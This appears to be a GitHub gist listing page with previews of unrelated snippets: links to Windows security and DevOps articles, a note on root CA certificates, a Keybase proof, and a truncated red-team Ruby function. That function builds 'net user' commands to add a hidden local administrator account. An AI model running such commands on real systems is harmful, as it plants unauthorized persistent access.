- https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/about-this-book
- https://www.fortynorthsecurity.com/mass-powershell-and-wmimplant/
- https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/
- https://rlevchenko.com/2017/03/17/how-easy-is-it-to-track-group-policy-changes-using-the-event-log/
- http://www.redblue.team/2015/09/spotting-adversary-with-windows-event.html
- https://blogs.technet.microsoft.com/ashleymcglone/2015/03/20/deploy-active-directory-with-powershell-dsc-a-k-a-dsc-promo/
- https://github.com/JacksonVD/PwnedPasswordsDLL
- https://stealthpuppy.com/deploy-enterprise-root-certificate-authority/
- https://blog.flux7.com/how-to-organize-infrastructure-as-code-in-your-source-code-repository
- https://logrhythm.com/blog/detecting-lateral-movement-from-pass-the-hash-attacks/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#add_admin_windows(client, redteam, password) | |
#add_admin_linux(client, redteam, password) | |
def add_admin_windows(session, username, userpasswd) | |
print_status("adding admin user: #{username}") | |
# Ref: https://www.windows-commandline.com/add-user-from-command-line/ | |
add_user_cmd='cmd.exe /c net user #{username} #{userpasswd} /ADD /PASSWORDCHG:NO' | |
make_user_admin_cmd='cmd.exe /c net localgroup administrators #{username} /add' |
While working from inside company network, which uses self-signed certificate to monitor SSL traffic, various programs will start failing.
Here is list of them and how to resolve the issue.
Extract the Root CA and install on the host.
I hereby claim:
- I am chandanchowdhury on github.
- I am i_virus (https://keybase.io/i_virus) on keybase.
- I have a public key whose fingerprint is 8624 5273 7827 9AC4 E1D9 B257 1F56 4FEC 8D26 4684
To claim this, I am signing this object: